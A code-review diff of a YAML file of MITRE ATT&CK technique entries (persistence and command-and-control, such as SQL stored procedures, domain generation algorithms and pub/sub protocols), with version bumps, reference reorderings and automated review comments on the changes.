- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36602,20 +36997,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
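Review bot: the only substantive change in the re-added T1505.001 `external_references` block is the refresh of the two NetSPI entries from `blog.netspi.com/...` to `www.netspi.com/blog/technical-blog/...` with `Retrieved September 12, 2024`; everything else is the same references in a different order (Microsoft CLR before xp_cmdshell, Kaspersky before NetSPI), deleted in the previous hunk and reinserted here. A sentence in the commit message saying so would save reviewers diffing the two blocks by hand, and the reorder itself is another symptom of the unstable key and list ordering noted for T1078.004.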
@@ -36645,7 +37077,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36669,12 +37101,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36758,11 +37188,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36814,9 +37243,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36865,7 +37293,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36903,14 +37331,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36973,7 +37399,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -37031,97 +37456,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
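Review bot: the substantive changes in this T1568.002 hunk are buried under a full key reorder, which makes them easy to miss: `x_mitre_version` moves from '1.0' to '1.1', `x_mitre_permissions_required: - User` is removed with no replacement, `revoked: false` and `x_mitre_deprecated: false` are added, and the `Akamai DGA Mitigation` reference URL changes from `https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html` to `https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e`. Confirm the URL swap comes from the upstream ATT&CK bundle rather than a hand edit, and consider noting in the PR description that the generator now serialises keys in a different order, so future diffs of this file can be read for content changes only.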
@@ -37187,9 +37610,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
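Review bot: in the new T1071.005 entry the double-quoted `description` scalar is broken across lines mid-sentence at `Protocols such as MQTT` / `, XMPP` / `AMQP`, and several of those fragments carry no `+` prefix as shown here. If the generated YAML really looks like this, the quoted scalar will still parse (line breaks inside it fold to spaces) but the rendered text would read `MQTT , XMPP , AMQP , and STOMP`; load the file with a YAML parser and compare the description against the upstream ATT&CK text before merging. `x_mitre_detection: ''` being empty is the upstream value for this new sub-technique and needs no change.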
@@ -37235,7 +37716,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -37267,7 +37747,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37289,22 +37769,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37326,7 +37804,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37351,7 +37829,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -37435,7 +37912,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -37499,11 +37975,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37587,7 +38062,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -37618,7 +38092,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37638,8 +38112,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37661,8 +38135,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -37724,7 +38196,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37772,7 +38243,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37826,7 +38296,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37859,7 +38328,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37879,8 +38348,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
